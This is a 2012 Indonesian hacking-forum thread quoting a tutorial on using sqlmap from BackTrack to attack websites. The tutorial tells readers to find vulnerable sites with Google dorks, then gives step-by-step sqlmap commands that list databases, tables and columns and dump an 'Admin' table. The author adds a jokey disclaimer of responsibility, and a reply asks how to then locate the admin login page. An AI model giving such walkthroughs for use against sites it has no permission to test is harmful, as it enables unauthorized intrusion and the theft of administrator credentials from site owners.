05-28-2012, 11:00 PM
(05-28-2012, 03:32 PM)ivan_stg Wrote:(08-30-2011, 03:48 PM)Veronochi Wrote: ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack...
ok langsung aja dari pada lama2..
yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh...
hihihiihih
ok serius nie..
1.buka SQL Map kalian dengan cara
Code:Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...
3.setelah dapet web yang ada celah silakan pentest..
-u = urlCode:python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
--dbs = kita mencari nama databasenya...
4.setalah ketemua nama databasenya..
-D = nama database yang sudah kita temukan tadiCode:python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
--tables = untuk muka isi table..
5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:python sqlmap.py http://site.com -D gatotganteng -T Admin --columns
Code:pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump
kalo udah begini silakan dah..
mau kalian apain tapi yang jelas w kgk tanggung jawab ya..
wkwkwkkwkwkkwk
:ngakak:
udah jangan lupa
:kasihcendol:
wkwkkwkwk
salam veronochi
dan w hanya mau berbagi kepada orang-orang yang mau belajar...
nah habis itu mencari form login nya gmn om?
halaman login? nih lagi dibahas disini:
http://forum.indonesianbacktrack.or.id/s...511&page=2
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
Personal blog: http://ikonspirasi.net